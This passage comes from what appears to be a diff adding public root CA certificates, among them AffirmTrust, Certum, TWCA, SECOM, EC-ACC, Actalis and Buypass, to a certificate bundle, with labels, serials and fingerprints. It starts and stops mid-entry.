29:36:21:02:8b:20:ed:02:f5:66:c5:32:d1:d6:ed:90:9f:45:00:2f +# SHA256 Fingerprint: 0a:81:ec:5a:92:97:77:f1:45:90:4a:f3:8d:5d:50:9f:66:b5:e2:c5:8f:cd:b5:31:05:8b:0e:17:f3:f0:b4:1b +-----BEGIN CERTIFICATE----- +MIIDTDCCAjSgAwIBAgIIfE8EORzUmS0wDQYJKoZIhvcNAQEFBQAwRDELMAkGA1UE +BhMCVVMxFDASBgNVBAoMC0FmZmlybVRydXN0MR8wHQYDVQQDDBZBZmZpcm1UcnVz +dCBOZXR3b3JraW5nMB4XDTEwMDEyOTE0MDgyNFoXDTMwMTIzMTE0MDgyNFowRDEL +MAkGA1UEBhMCVVMxFDASBgNVBAoMC0FmZmlybVRydXN0MR8wHQYDVQQDDBZBZmZp +cm1UcnVzdCBOZXR3b3JraW5nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKC +AQEAtITMMxcua5Rsa2FSoOujz3mUTOWUgJnLVWREZY9nZOIG41w3SfYvm4SEHi3y +YJ0wTsyEheIszx6e/jarM3c1RNg1lho9Nuh6DtjVR6FqaYvZ/Ls6rnla1fTWcbua +kCNrmreIdIcMHl+5ni36q1Mr3Lt2PpNMCAiMHqIjHNRqrSK6mQEubWXLviRmVSRL +QESxG9fhwoXA3hA/Pe24/PHxI1Pcv2WXb9n5QHGNfb2V1M6+oF4nI979ptAmDgAp +6zxG8D1gvz9Q0twmQVGeFDdCBKNwV6gbh+0t+nvujArjqWaJGctB+d1ENmHP4ndG +yH329JKBNv3bNPFyfvMMFr20FQIDAQABo0IwQDAdBgNVHQ4EFgQUBx/S55zawm6i +QLSwelAQUHTEyL0wDwYDVR0TAQH/BAUwAwEB/zAOBgNVHQ8BAf8EBAMCAQYwDQYJ +KoZIhvcNAQEFBQADggEBAIlXshZ6qML91tmbmzTCnLQyFE2npN/svqe++EPbkTfO +tDIuUFUaNU52Q3Eg75N3ThVwLofDwR1t3Mu1J9QsVtFSUzpE0nPIxBsFZVpikpzu +QY0x2+c06lkh1QF612S4ZDnNye2v7UsDSKegmQGA3GWjNq5lWUhPgkvIZfFXHeVZ +Lgo/bNjR9eUJtGxUAArgFU2HdW23WJZa3W3SAKD0m0i+wzekujbgfIeFlxoVot4u +olu9rxj5kFDNcFn4J2dHy8egBzp90SxdbBk6ZrV9/ZFvgrG+CJPbFEfxojfHRZ48 +x3evZKiT3/Zpg4Jg8klCNO1aAFSFHBY2kgxc+qatv9s= +-----END CERTIFICATE----- + +# Issuer: CN=AffirmTrust Premium O=AffirmTrust +# Subject: CN=AffirmTrust Premium O=AffirmTrust +# Label: "AffirmTrust Premium" +# Serial: 7893706540734352110 +# MD5 Fingerprint: c4:5d:0e:48:b6:ac:28:30:4e:0a:bc:f9:38:16:87:57 +# SHA1 Fingerprint: d8:a6:33:2c:e0:03:6f:b1:85:f6:63:4f:7d:6a:06:65:26:32:28:27 +# SHA256 Fingerprint: 70:a7:3f:7f:37:6b:60:07:42:48:90:45:34:b1:14:82:d5:bf:0e:69:8e:cc:49:8d:f5:25:77:eb:f2:e9:3b:9a +-----BEGIN CERTIFICATE----- +MIIFRjCCAy6gAwIBAgIIbYwURrGmCu4wDQYJKoZIhvcNAQEMBQAwQTELMAkGA1UE +BhMCVVMxFDASBgNVBAoMC0FmZmlybVRydXN0MRwwGgYDVQQDDBNBZmZpcm1UcnVz +dCBQcmVtaXVtMB4XDTEwMDEyOTE0MTAzNloXDTQwMTIzMTE0MTAzNlowQTELMAkG +A1UEBhMCVVMxFDASBgNVBAoMC0FmZmlybVRydXN0MRwwGgYDVQQDDBNBZmZpcm1U +cnVzdCBQcmVtaXVtMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAxBLf +qV/+Qd3d9Z+K4/as4Tx4mrzY8H96oDMq3I0gW64tb+eT2TZwamjPjlGjhVtnBKAQ +JG9dKILBl1fYSCkTtuG+kU3fhQxTGJoeJKJPj/CihQvL9Cl/0qRY7iZNyaqoe5rZ ++jjeRFcV5fiMyNlI4g0WJx0eyIOFJbe6qlVBzAMiSy2RjYvmia9mx+n/K+k8rNrS +s8PhaJyJ+HoAVt70VZVs+7pk3WKL3wt3MutizCaam7uqYoNMtAZ6MMgpv+0GTZe5 +HMQxK9VfvFMSF5yZVylmd2EhMQcuJUmdGPLu8ytxjLW6OQdJd/zvLpKQBY0tL3d7 +70O/Nbua2Plzpyzy0FfuKE4mX4+QaAkvuPjcBukumj5Rp9EixAqnOEhss/n/fauG +V+O61oV4d7pD6kh/9ti+I20ev9E2bFhc8e6kGVQa9QPSdubhjL08s9NIS+LI+H+S +qHZGnEJlPqQewQcDWkYtuJfzt9WyVSHvutxMAJf7FJUnM7/oQ0dG0giZFmA7mn7S +5u046uwBHjxIVkkJx0w3AJ6IDsBz4W9m6XJHMD4Q5QsDyZpCAGzFlH5hxIrff4Ia +C1nEWTJ3s7xgaVY5/bQGeyzWZDbZvUjthB9+pSKPKrhC9IK31FOQeE4tGv2Bb0TX +OwF0lkLgAOIua+rF7nKsu7/+6qqo+Nz2snmKtmcCAwEAAaNCMEAwHQYDVR0OBBYE +FJ3AZ6YMItkm9UWrpmVSESfYRaxjMA8GA1UdEwEB/wQFMAMBAf8wDgYDVR0PAQH/ +BAQDAgEGMA0GCSqGSIb3DQEBDAUAA4ICAQCzV00QYk465KzquByvMiPIs0laUZx2 +KI15qldGF9X1Uva3ROgIRL8YhNILgM3FEv0AVQVhh0HctSSePMTYyPtwni94loMg +Nt58D2kTiKV1NpgIpsbfrM7jWNa3Pt668+s0QNiigfV4Py/VpfzZotReBA4Xrf5B +8OWycvpEgjNC6C1Y91aMYj+6QrCcDFx+LmUmXFNPALJ4fqENmS2NuB2OosSw/WDQ +MKSOyARiqcTtNd56l+0OOF6SL5Nwpamcb6d9Ex1+xghIsV5n61EIJenmJWtSKZGc +0jlzCFfemQa0W50QBuHCAKi4HEoCChTQwUHK+4w1IX2COPKpVJEZNZOUbWo6xbLQ +u4mGk+ibyQ86p3q4ofB4Rvr8Ny/lioTz3/4E2aFooC8k4gmVBtWVyuEklut89pMF +u+1z6S3RdTnX5yTb2E5fQ4+e0BQ5v1VwSJlXMbSc7kqYA5YwH2AG7hsj/oFgIxpH +YoWlzBk0gG+zrBrjn/B7SK3VAdlntqlyk+otZrWyuOQ9PLLvTIzq6we/qzWaVYa8 +GKa1qF60g2xraUDTn9zxw2lrueFtCfTxqlB2Cnp9ehehVZZCmTEJ3WARjQUwfuaO +RtGdFNrHF+QFlozEJLUbzxQHskD4o55BhrwE0GuWyCqANP2/7waj3VjFhT0+j/6e +KeC2uAloGRwYQw== +-----END CERTIFICATE----- + +# Issuer: CN=AffirmTrust Premium ECC O=AffirmTrust +# Subject: CN=AffirmTrust Premium ECC O=AffirmTrust +# Label: "AffirmTrust Premium ECC" +# Serial: 8401224907861490260 +# MD5 Fingerprint: 64:b0:09:55:cf:b1:d5:99:e2:be:13:ab:a6:5d:ea:4d +# SHA1 Fingerprint: b8:23:6b:00:2f:1d:16:86:53:01:55:6c:11:a4:37:ca:eb:ff:c3:bb +# SHA256 Fingerprint: bd:71:fd:f6:da:97:e4:cf:62:d1:64:7a:dd:25:81:b0:7d:79:ad:f8:39:7e:b4:ec:ba:9c:5e:84:88:82:14:23 +-----BEGIN CERTIFICATE----- +MIIB/jCCAYWgAwIBAgIIdJclisc/elQwCgYIKoZIzj0EAwMwRTELMAkGA1UEBhMC +VVMxFDASBgNVBAoMC0FmZmlybVRydXN0MSAwHgYDVQQDDBdBZmZpcm1UcnVzdCBQ +cmVtaXVtIEVDQzAeFw0xMDAxMjkxNDIwMjRaFw00MDEyMzExNDIwMjRaMEUxCzAJ +BgNVBAYTAlVTMRQwEgYDVQQKDAtBZmZpcm1UcnVzdDEgMB4GA1UEAwwXQWZmaXJt +VHJ1c3QgUHJlbWl1bSBFQ0MwdjAQBgcqhkjOPQIBBgUrgQQAIgNiAAQNMF4bFZ0D +0KF5Nbc6PJJ6yhUczWLznCZcBz3lVPqj1swS6vQUX+iOGasvLkjmrBhDeKzQN8O9 +ss0s5kfiGuZjuD0uL3jET9v0D6RoTFVya5UdThhClXjMNzyR4ptlKymjQjBAMB0G +A1UdDgQWBBSaryl6wBE1NSZRMADDav5A1a7WPDAPBgNVHRMBAf8EBTADAQH/MA4G +A1UdDwEB/wQEAwIBBjAKBggqhkjOPQQDAwNnADBkAjAXCfOHiFBar8jAQr9HX/Vs +aobgxCd05DhT1wV/GzTjxi+zygk8N53X57hG8f2h4nECMEJZh0PUUd+60wkyWs6I +flc9nF9Ca/UHLbXwgpP5WW+uZPpY5Yse42O+tYHNbwKMeQ== +-----END CERTIFICATE----- + +# Issuer: CN=Certum Trusted Network CA O=Unizeto Technologies S.A. OU=Certum Certification Authority +# Subject: CN=Certum Trusted Network CA O=Unizeto Technologies S.A. OU=Certum Certification Authority +# Label: "Certum Trusted Network CA" +# Serial: 279744 +# MD5 Fingerprint: d5:e9:81:40:c5:18:69:fc:46:2c:89:75:62:0f:aa:78 +# SHA1 Fingerprint: 07:e0:32:e0:20:b7:2c:3f:19:2f:06:28:a2:59:3a:19:a7:0f:06:9e +# SHA256 Fingerprint: 5c:58:46:8d:55:f5:8e:49:7e:74:39:82:d2:b5:00:10:b6:d1:65:37:4a:cf:83:a7:d4:a3:2d:b7:68:c4:40:8e +-----BEGIN CERTIFICATE----- +MIIDuzCCAqOgAwIBAgIDBETAMA0GCSqGSIb3DQEBBQUAMH4xCzAJBgNVBAYTAlBM +MSIwIAYDVQQKExlVbml6ZXRvIFRlY2hub2xvZ2llcyBTLkEuMScwJQYDVQQLEx5D +ZXJ0dW0gQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkxIjAgBgNVBAMTGUNlcnR1bSBU +cnVzdGVkIE5ldHdvcmsgQ0EwHhcNMDgxMDIyMTIwNzM3WhcNMjkxMjMxMTIwNzM3 +WjB+MQswCQYDVQQGEwJQTDEiMCAGA1UEChMZVW5pemV0byBUZWNobm9sb2dpZXMg +Uy5BLjEnMCUGA1UECxMeQ2VydHVtIENlcnRpZmljYXRpb24gQXV0aG9yaXR5MSIw +IAYDVQQDExlDZXJ0dW0gVHJ1c3RlZCBOZXR3b3JrIENBMIIBIjANBgkqhkiG9w0B +AQEFAAOCAQ8AMIIBCgKCAQEA4/t9o3K6wvDJFIf1awFO4W5AB7ptJ11/91sts1rH +UV+rpDKmYYe2bg+G0jACl/jXaVehGDldamR5xgFZrDwxSjh80gTSSyjoIF87B6LM +TXPb865Px1bVWqeWifrzq2jUI4ZZJ88JJ7ysbnKDHDBy3+Ci6dLhdHUZvSqeexVU +BBvXQzmtVSjF4hq79MDkrjhJM8x2hZ85RdKknvISjFH4fOQtf/WsX+sWn7Et0brM +kUJ3TCXJkDhv2/DM+44el1k+1WBO5gUo7Ul5E0u6SNsv+XLTOcr+H9g0cvW0QM8x +AcPs3hEtF10fuFDRXhmnad4HMyjKUJX5p1TLVIZQRan5SQIDAQABo0IwQDAPBgNV +HRMBAf8EBTADAQH/MB0GA1UdDgQWBBQIds3LB/8k9sXN7buQvOKEN0Z19zAOBgNV +HQ8BAf8EBAMCAQYwDQYJKoZIhvcNAQEFBQADggEBAKaorSLOAT2mo/9i0Eidi15y +sHhE49wcrwn9I0j6vSrEuVUEtRCjjSfeC4Jj0O7eDDd5QVsisrCaQVymcODU0HfL +I9MA4GxWL+FpDQ3Zqr8hgVDZBqWo/5U30Kr+4rP1mS1FhIrlQgnXdAIv94nYmem8 +J9RHjboNRhx3zxSkHLmkMcScKHQDNP8zGSal6Q10tz6XxnboJ5ajZt3hrvJBW8qY +VoNzcOSGGtIxQbovvi0TWnZvTuhOgQ4/WwMioBK+ZlgRSssDxLQqKi2WF+A5VLxI +03YnnZotBqbJ7DnSq9ufmgsnAjUpsUCV5/nonFWIGUbWtzT1fs45mtk48VH3Tyw= +-----END CERTIFICATE----- + +# Issuer: CN=TWCA Root Certification Authority O=TAIWAN-CA OU=Root CA +# Subject: CN=TWCA Root Certification Authority O=TAIWAN-CA OU=Root CA +# Label: "TWCA Root Certification Authority" +# Serial: 1 +# MD5 Fingerprint: aa:08:8f:f6:f9:7b:b7:f2:b1:a7:1e:9b:ea:ea:bd:79 +# SHA1 Fingerprint: cf:9e:87:6d:d3:eb:fc:42:26:97:a3:b5:a3:7a:a0:76:a9:06:23:48 +# SHA256 Fingerprint: bf:d8:8f:e1:10:1c:41:ae:3e:80:1b:f8:be:56:35:0e:e9:ba:d1:a6:b9:bd:51:5e:dc:5c:6d:5b:87:11:ac:44 +-----BEGIN CERTIFICATE----- +MIIDezCCAmOgAwIBAgIBATANBgkqhkiG9w0BAQUFADBfMQswCQYDVQQGEwJUVzES +MBAGA1UECgwJVEFJV0FOLUNBMRAwDgYDVQQLDAdSb290IENBMSowKAYDVQQDDCFU +V0NBIFJvb3QgQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkwHhcNMDgwODI4MDcyNDMz +WhcNMzAxMjMxMTU1OTU5WjBfMQswCQYDVQQGEwJUVzESMBAGA1UECgwJVEFJV0FO +LUNBMRAwDgYDVQQLDAdSb290IENBMSowKAYDVQQDDCFUV0NBIFJvb3QgQ2VydGlm +aWNhdGlvbiBBdXRob3JpdHkwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB +AQCwfnK4pAOU5qfeCTiRShFAh6d8WWQUe7UREN3+v9XAu1bihSX0NXIP+FPQQeFE +AcK0HMMxQhZHhTMidrIKbw/lJVBPhYa+v5guEGcevhEFhgWQxFnQfHgQsIBct+HH +K3XLfJ+utdGdIzdjp9xCoi2SBBtQwXu4PhvJVgSLL1KbralW6cH/ralYhzC2gfeX +RfwZVzsrb+RH9JlF/h3x+JejiB03HFyP4HYlmlD4oFT/RJB2I9IyxsOrBr/8+7/z +rX2SYgJbKdM1o5OaQ2RgXbL6Mv87BK9NQGr5x+PvI/1ry+UPizgN7gr8/g+YnzAx +3WxSZfmLgb4i4RxYA7qRG4kHAgMBAAGjQjBAMA4GA1UdDwEB/wQEAwIBBjAPBgNV +HRMBAf8EBTADAQH/MB0GA1UdDgQWBBRqOFsmjd6LWvJPelSDGRjjCDWmujANBgkq +hkiG9w0BAQUFAAOCAQEAPNV3PdrfibqHDAhUaiBQkr6wQT25JmSDCi/oQMCXKCeC +MErJk/9q56YAf4lCmtYR5VPOL8zy2gXE/uJQxDqGfczafhAJO5I1KlOy/usrBdls +XebQ79NqZp4VKIV66IIArB6nCWlWQtNoURi+VJq/REG6Sb4gumlc7rh3zc5sH62D +lhh9DrUUOYTxKOkto557HnpyWoOzeW/vtPzQCqVYT0bf+215WfKEIlKuD8z7fDvn +aspHYcN6+NOSBB+4IIThNlQWx0DeO4pz3N/GCUzf7Nr/1FNCocnyYh0igzyXxfkZ +YiesZSLX0zzG5Y6yU8xJzrww/nsOM5D77dIUkR8Hrw== +-----END CERTIFICATE----- + +# Issuer: O=SECOM Trust Systems CO.,LTD. OU=Security Communication RootCA2 +# Subject: O=SECOM Trust Systems CO.,LTD. OU=Security Communication RootCA2 +# Label: "Security Communication RootCA2" +# Serial: 0 +# MD5 Fingerprint: 6c:39:7d:a4:0e:55:59:b2:3f:d6:41:b1:12:50:de:43 +# SHA1 Fingerprint: 5f:3b:8c:f2:f8:10:b3:7d:78:b4:ce:ec:19:19:c3:73:34:b9:c7:74 +# SHA256 Fingerprint: 51:3b:2c:ec:b8:10:d4:cd:e5:dd:85:39:1a:df:c6:c2:dd:60:d8:7b:b7:36:d2:b5:21:48:4a:a4:7a:0e:be:f6 +-----BEGIN CERTIFICATE----- +MIIDdzCCAl+gAwIBAgIBADANBgkqhkiG9w0BAQsFADBdMQswCQYDVQQGEwJKUDEl +MCMGA1UEChMcU0VDT00gVHJ1c3QgU3lzdGVtcyBDTy4sTFRELjEnMCUGA1UECxMe +U2VjdXJpdHkgQ29tbXVuaWNhdGlvbiBSb290Q0EyMB4XDTA5MDUyOTA1MDAzOVoX +DTI5MDUyOTA1MDAzOVowXTELMAkGA1UEBhMCSlAxJTAjBgNVBAoTHFNFQ09NIFRy +dXN0IFN5c3RlbXMgQ08uLExURC4xJzAlBgNVBAsTHlNlY3VyaXR5IENvbW11bmlj +YXRpb24gUm9vdENBMjCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBANAV +OVKxUrO6xVmCxF1SrjpDZYBLx/KWvNs2l9amZIyoXvDjChz335c9S672XewhtUGr +zbl+dp+++T42NKA7wfYxEUV0kz1XgMX5iZnK5atq1LXaQZAQwdbWQonCv/Q4EpVM +VAX3NuRFg3sUZdbcDE3R3n4MqzvEFb46VqZab3ZpUql6ucjrappdUtAtCms1FgkQ +hNBqyjoGADdH5H5XTz+L62e4iKrFvlNVspHEfbmwhRkGeC7bYRr6hfVKkaHnFtWO +ojnflLhwHyg/i/xAXmODPIMqGplrz95Zajv8bxbXH/1KEOtOghY6rCcMU/Gt1SSw +awNQwS08Ft1ENCcadfsCAwEAAaNCMEAwHQYDVR0OBBYEFAqFqXdlBZh8QIH4D5cs +OPEK7DzPMA4GA1UdDwEB/wQEAwIBBjAPBgNVHRMBAf8EBTADAQH/MA0GCSqGSIb3 +DQEBCwUAA4IBAQBMOqNErLlFsceTfsgLCkLfZOoc7llsCLqJX2rKSpWeeo8HxdpF +coJxDjrSzG+ntKEju/Ykn8sX/oymzsLS28yN/HH8AynBbF0zX2S2ZTuJbxh2ePXc +okgfGT+Ok+vx+hfuzU7jBBJV1uXk3fs+BXziHV7Gp7yXT2g69ekuCkO2r1dcYmh8 +t/2jioSgrGK+KwmHNPBqAbubKVY8/gA3zyNs8U6qtnRGEmyR7jTV7JqR50S+kDFy +1UkC9gLl9B/rfNmWVan/7Ir5mUf/NVoCqgTLiluHcSmRvaS0eg29mvVXIwAHIRc/ +SjnRBUkLp7Y3gaVdjKozXoEofKd9J+sAro03 +-----END CERTIFICATE----- + +# Issuer: CN=EC-ACC O=Agencia Catalana de Certificacio (NIF Q-0801176-I) OU=Serveis Publics de Certificacio/Vegeu https://www.catcert.net/verarrel (c)03/Jerarquia Entitats de Certificacio Catalanes +# Subject: CN=EC-ACC O=Agencia Catalana de Certificacio (NIF Q-0801176-I) OU=Serveis Publics de Certificacio/Vegeu https://www.catcert.net/verarrel (c)03/Jerarquia Entitats de Certificacio Catalanes +# Label: "EC-ACC" +# Serial: -23701579247955709139626555126524820479 +# MD5 Fingerprint: eb:f5:9d:29:0d:61:f9:42:1f:7c:c2:ba:6d:e3:15:09 +# SHA1 Fingerprint: 28:90:3a:63:5b:52:80:fa:e6:77:4c:0b:6d:a7:d6:ba:a6:4a:f2:e8 +# SHA256 Fingerprint: 88:49:7f:01:60:2f:31:54:24:6a:e2:8c:4d:5a:ef:10:f1:d8:7e:bb:76:62:6f:4a:e0:b7:f9:5b:a7:96:87:99 +-----BEGIN CERTIFICATE----- +MIIFVjCCBD6gAwIBAgIQ7is969Qh3hSoYqwE893EATANBgkqhkiG9w0BAQUFADCB +8zELMAkGA1UEBhMCRVMxOzA5BgNVBAoTMkFnZW5jaWEgQ2F0YWxhbmEgZGUgQ2Vy +dGlmaWNhY2lvIChOSUYgUS0wODAxMTc2LUkpMSgwJgYDVQQLEx9TZXJ2ZWlzIFB1 +YmxpY3MgZGUgQ2VydGlmaWNhY2lvMTUwMwYDVQQLEyxWZWdldSBodHRwczovL3d3 +dy5jYXRjZXJ0Lm5ldC92ZXJhcnJlbCAoYykwMzE1MDMGA1UECxMsSmVyYXJxdWlh +IEVudGl0YXRzIGRlIENlcnRpZmljYWNpbyBDYXRhbGFuZXMxDzANBgNVBAMTBkVD +LUFDQzAeFw0wMzAxMDcyMzAwMDBaFw0zMTAxMDcyMjU5NTlaMIHzMQswCQYDVQQG +EwJFUzE7MDkGA1UEChMyQWdlbmNpYSBDYXRhbGFuYSBkZSBDZXJ0aWZpY2FjaW8g +KE5JRiBRLTA4MDExNzYtSSkxKDAmBgNVBAsTH1NlcnZlaXMgUHVibGljcyBkZSBD +ZXJ0aWZpY2FjaW8xNTAzBgNVBAsTLFZlZ2V1IGh0dHBzOi8vd3d3LmNhdGNlcnQu +bmV0L3ZlcmFycmVsIChjKTAzMTUwMwYDVQQLEyxKZXJhcnF1aWEgRW50aXRhdHMg +ZGUgQ2VydGlmaWNhY2lvIENhdGFsYW5lczEPMA0GA1UEAxMGRUMtQUNDMIIBIjAN +BgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAsyLHT+KXQpWIR4NA9h0X84NzJB5R +85iKw5K4/0CQBXCHYMkAqbWUZRkiFRfCQ2xmRJoNBD45b6VLeqpjt4pEndljkYRm +4CgPukLjbo73FCeTae6RDqNfDrHrZqJyTxIThmV6PttPB/SnCWDaOkKZx7J/sxaV +HMf5NLWUhdWZXqBIoH7nF2W4onW4HvPlQn2v7fOKSGRdghST2MDk/7NQcvJ29rNd +QlB50JQ+awwAvthrDk4q7D7SzIKiGGUzE3eeml0aE9jD2z3Il3rucO2n5nzbcc8t +lGLfbdb1OL4/pYUKGbio2Al1QnDE6u/LDsg0qBIimAy4E5S2S+zw0JDnJwIDAQAB +o4HjMIHgMB0GA1UdEQQWMBSBEmVjX2FjY0BjYXRjZXJ0Lm5ldDAPBgNVHRMBAf8E +BTADAQH/MA4GA1UdDwEB/wQEAwIBBjAdBgNVHQ4EFgQUoMOLRKo3pUW/l4Ba0fF4 +opvpXY0wfwYDVR0gBHgwdjB0BgsrBgEEAfV4AQMBCjBlMCwGCCsGAQUFBwIBFiBo +dHRwczovL3d3dy5jYXRjZXJ0Lm5ldC92ZXJhcnJlbDA1BggrBgEFBQcCAjApGidW +ZWdldSBodHRwczovL3d3dy5jYXRjZXJ0Lm5ldC92ZXJhcnJlbCAwDQYJKoZIhvcN +AQEFBQADggEBAKBIW4IB9k1IuDlVNZyAelOZ1Vr/sXE7zDkJlF7W2u++AVtd0x7Y +/X1PzaBB4DSTv8vihpw3kpBWHNzrKQXlxJ7HNd+KDM3FIUPpqojlNcAZQmNaAl6k +SBg6hW/cnbw/nZzBh7h6YQjpdwt/cKt63dmXLGQehb+8dJahw3oS7AwaboMMPOhy +Rp/7SNVel+axofjk70YllJyJ22k4vuxcDlbHZVHlUIiIv0LVKz3l+bqeLrPK9HOS +Agu+TGbrIP65y7WZf+a2E/rKS03Z7lNGBjvGTq2TWoF+bCpLagVFjPIhpDGQh2xl +nJ2lYJU6Un/10asIbvPuW/mIPX64b24D5EI= +-----END CERTIFICATE----- + +# Issuer: CN=Actalis Authentication Root CA O=Actalis S.p.A./03358520967 +# Subject: CN=Actalis Authentication Root CA O=Actalis S.p.A./03358520967 +# Label: "Actalis Authentication Root CA" +# Serial: 6271844772424770508 +# MD5 Fingerprint: 69:c1:0d:4f:07:a3:1b:c3:fe:56:3d:04:bc:11:f6:a6 +# SHA1 Fingerprint: f3:73:b3:87:06:5a:28:84:8a:f2:f3:4a:ce:19:2b:dd:c7:8e:9c:ac +# SHA256 Fingerprint: 55:92:60:84:ec:96:3a:64:b9:6e:2a:be:01:ce:0b:a8:6a:64:fb:fe:bc:c7:aa:b5:af:c1:55:b3:7f:d7:60:66 +-----BEGIN CERTIFICATE----- +MIIFuzCCA6OgAwIBAgIIVwoRl0LE48wwDQYJKoZIhvcNAQELBQAwazELMAkGA1UE +BhMCSVQxDjAMBgNVBAcMBU1pbGFuMSMwIQYDVQQKDBpBY3RhbGlzIFMucC5BLi8w +MzM1ODUyMDk2NzEnMCUGA1UEAwweQWN0YWxpcyBBdXRoZW50aWNhdGlvbiBSb290 +IENBMB4XDTExMDkyMjExMjIwMloXDTMwMDkyMjExMjIwMlowazELMAkGA1UEBhMC +SVQxDjAMBgNVBAcMBU1pbGFuMSMwIQYDVQQKDBpBY3RhbGlzIFMucC5BLi8wMzM1 +ODUyMDk2NzEnMCUGA1UEAwweQWN0YWxpcyBBdXRoZW50aWNhdGlvbiBSb290IENB +MIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIICCgKCAgEAp8bEpSmkLO/lGMWwUKNv +UTufClrJwkg4CsIcoBh/kbWHuUA/3R1oHwiD1S0eiKD4j1aPbZkCkpAW1V8IbInX +4ay8IMKx4INRimlNAJZaby/ARH6jDuSRzVju3PvHHkVH3Se5CAGfpiEd9UEtL0z9 +KK3giq0itFZljoZUj5NDKd45RnijMCO6zfB9E1fAXdKDa0hMxKufgFpbOr3JpyI/ +gCczWw63igxdBzcIy2zSekciRDXFzMwujt0q7bd9Zg1fYVEiVRvjRuPjPdA1Yprb +rxTIW6HMiRvhMCb8oJsfgadHHwTrozmSBp+Z07/T6k9QnBn+locePGX2oxgkg4YQ +51Q+qDp2JE+BIcXjDwL4k5RHILv+1A7TaLndxHqEguNTVHnd25zS8gebLra8Pu2F +be8lEfKXGkJh90qX6IuxEAf6ZYGyojnP9zz/GPvG8VqLWeICrHuS0E4UT1lF9gxe +KF+w6D9Fz8+vm2/7hNN3WpVvrJSEnu68wEqPSpP4RCHiMUVhUE4Q2OM1fEwZtN4F +v6MGn8i1zeQf1xcGDXqVdFUNaBr8EBtiZJ1t4JWgw5QHVw0U5r0F+7if5t+L4sbn +fpb2U8WANFAoWPASUHEXMLrmeGO89LKtmyuy/uE5jF66CyCU3nuDuP/jVo23Eek7 +jPKxwV2dpAtMK9myGPW1n0sCAwEAAaNjMGEwHQYDVR0OBBYEFFLYiDrIn3hm7Ynz +ezhwlMkCAjbQMA8GA1UdEwEB/wQFMAMBAf8wHwYDVR0jBBgwFoAUUtiIOsifeGbt +ifN7OHCUyQICNtAwDgYDVR0PAQH/BAQDAgEGMA0GCSqGSIb3DQEBCwUAA4ICAQAL +e3KHwGCmSUyIWOYdiPcUZEim2FgKDk8TNd81HdTtBjHIgT5q1d07GjLukD0R0i70 +jsNjLiNmsGe+b7bAEzlgqqI0JZN1Ut6nna0Oh4lScWoWPBkdg/iaKWW+9D+a2fDz +WochcYBNy+A4mz+7+uAwTc+G02UQGRjRlwKxK3JCaKygvU5a2hi/a5iB0P2avl4V +SM0RFbnAKVy06Ij3Pjaut2L9HmLecHgQHEhb2rykOLpn7VU+Xlff1ANATIGk0k9j +pwlCCRT8AKnCgHNPLsBA2RF7SOp6AsDT6ygBJlh0wcBzIm2Tlf05fbsq4/aC4yyX +X04fkZT6/iyj2HYauE2yOE+b+h1IYHkm4vP9qdCa6HCPSXrW5b0KDtst842/6+Ok +fcvHlXHo2qN8xcL4dJIEG4aspCJTQLas/kx2z/uUMsA1n3Y/buWQbqCmJqK4LL7R +K4X9p2jIugErsWx0Hbhzlefut8cl8ABMALJ+tguLHPPAUJ4lueAI3jZm/zel0btU +ZCzJJ7VLkn5l/9Mt4blOvH+kQSGQQXemOR/qnuOf0GZvBeyqdn6/axag67XH/JJU +LysRJyU3eExRarDzzFhdFPFqSBX/wge2sY0PjlxQRrM9vwGYT7JZVEc+NHt4bVaT +LnPqZih4zR0Uv6CPLy64Lo7yFIrM6bV8+2ydDKXhlg== +-----END CERTIFICATE----- + +# Issuer: CN=Buypass Class 2 Root CA O=Buypass AS-983163327 +# Subject: CN=Buypass Class 2 Root CA O=Buypass AS-983163327 +# Label: "Buypass Class 2 Root CA" +# Serial: 2 +# MD5 Fingerprint: 46:a7:d2:fe:45:fb:64:5a:a8:59:90:9b:78:44:9b:29 +# SHA1 Fingerprint: 49:0a:75:74:de:87:0a:47:fe:58:ee:f6:c7:6b:eb:c6:0b:12:40:99 +# SHA256 Fingerprint: 9a:11:40:25:19:7c:5b:b9:5d:94:e6:3d:55:cd:43:79:08:47:b6:46:b2:3c:df:11:ad:a4:a0:0e:ff:15:fb:48 +-----BEGIN CERTIFICATE----- +MIIFWTCCA0GgAwIBAgIBAjANBgkqhkiG9w0BAQsFADBOMQswCQYDVQQGEwJOTzEd +MBsGA1UECgwUQnV5cGFzcyBBUy05ODMxNjMzMjcxIDAeBgNVBAMMF0J1eXBhc3Mg +Q2xhc3MgMiBSb290IENBMB4XDTEwMTAyNjA4MzgwM1oXDTQwMTAyNjA4MzgwM1ow +TjELMAkGA1UEBhMCTk8xHTAbBgNVBAoMFEJ1eXBhc3MgQVMtOTgzMTYzMzI3MSAw +HgYDVQQDDBdCdXlwYXNzIENsYXNzIDIgUm9vdCBDQTCCAiIwDQYJKoZIhvcNAQEB +BQADggIPADCCAgoCggIBANfHXvfBB9R3+0Mh9PT1aeTuMgHbo4Yf5FkNuud1g1Lr +6hxhFUi7HQfKjK6w3Jad6sNgkoaCKHOcVgb/S2TwDCo3SbXlzwx87vFKu3MwZfPV +L4O2fuPn9Z6rYPnT8Z2SdIrkHJasW4DptfQxh6NR/Md+oW+OU3fUl8FVM5I+GC91 +1K2GScuVr1QGbNgGE41b/+EmGVnAJLqBcXmQRFBoJJRfuLMR8SlBYaNByyM21cHx +MlAQTn/0hpPshNOOvEu/XAFOBz3cFIqUCqTqc/sLUegTBxj6DvEr0VQVfTzh97QZ +QmdiXnfgolXsttlpF9U6r0TtSsWe5HonfOV116rLJeffawrbD02TTqigzXsu8lkB +arcNuAeBfos4GzjmCleZPe4h6KP1DBbdi+w0jpwqHAAVF41og9JwnxgIzRFo1clr +Us3ERo/ctfPYV3Me6ZQ5BL/T3jjetFPsaRyifsSP5BtwrfKi+fv3FmRmaZ9JUaLi +FRhnBkp/1Wy1TbMz4GHrXb7pmA8y1x1LPC5aAVKRCfLf6o3YBkBjqhHk/sM3nhRS +P/TizPJhk9H9Z2vXUq6/aKtAQ6BXNVN48FP4YUIHZMbXb5tMOA1jrGKvNouicwoN +9SG9dKpN6nIDSdvHXx1iY8f93ZHsM+71bbRuMGjeyNYmsHVee7QHIJihdjK4TWxP 